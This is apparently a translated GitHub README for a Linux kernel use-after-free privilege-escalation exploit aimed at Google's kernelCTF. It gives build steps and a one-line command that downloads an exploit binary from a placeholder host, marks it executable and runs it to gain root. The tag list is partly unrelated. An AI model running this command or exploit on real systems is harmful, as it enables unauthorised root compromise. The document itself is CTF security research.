shxve/OhClock
GitHub: shxve/OhClock
OhClock 是一个利用 Linux LTS 内核 POSIX CPU 定时器 UAF 漏洞实现本地提权的 PoC 利用代码。
Stars: 0 | Forks: 0
# OhClock
OhClock 是一个针对 Linux LTS 内核的 0/1 day 本地提权漏洞利用,通过 POSIX CPU-timer 的释放后使用(use-after-free)漏洞,从无特权的受限 shell 提权至 root。
专为 Google kernelCTF 最新实例(`lts-6.12.95`)及其双 vCPU Intel Xeon Platinum 8481C 实例构建和调优。
感谢 X 上最近的一篇帖子让我们发现了这个漏洞 :)
将其变为通用的 LPE 就留给读者作为练习吧 ;)
作者:Pietro Foroni 和 Dan。
## 概念验证
[](https://asciinema.org/a/y5K12hlmd4RL4t0M)
## 构建
```
make
```
将该二进制文件公开到实例可访问的 endpoint:
```
python3 -m http.server 8000
```
## 运行
现在让我们在 Google 的 kernelCTF 实例上捕获 flag 吧!!
使用 [kernelCTF 规则](https://google.github.io/security-research/kernelctf/rules.html) 中发布的证书进行连接:
```
nano server_cert.pem
socat - ssl:kernelctf.vrp.ctfcompetition.com:1337,cafile=server_cert.pem
```
选择 `lts-6.12.95`,然后选择 `run`,在实例内部执行:
```
cd /tmp && wget -q http://yourhost:8000/exploit -O exploit && chmod +x exploit && CORE_WRITE_ATTEMPTS=3600 ./exploit
```
成功后:
```
id
cat /flag
```
## 免责声明
本项目仅出于安全研究和教育目的发布。
它针对的是一个已在上游修复的漏洞(`920f893f735e`,2026-07-05)。
请仅在你拥有或明确获得授权测试的系统上使用。作者不对任何滥用行为或该漏洞利用可能造成的任何损害承担责任。
标签:Bing搜索, Linux内核, Web报告查看器, 安全渗透, 客户端加密, 提权, 本地提权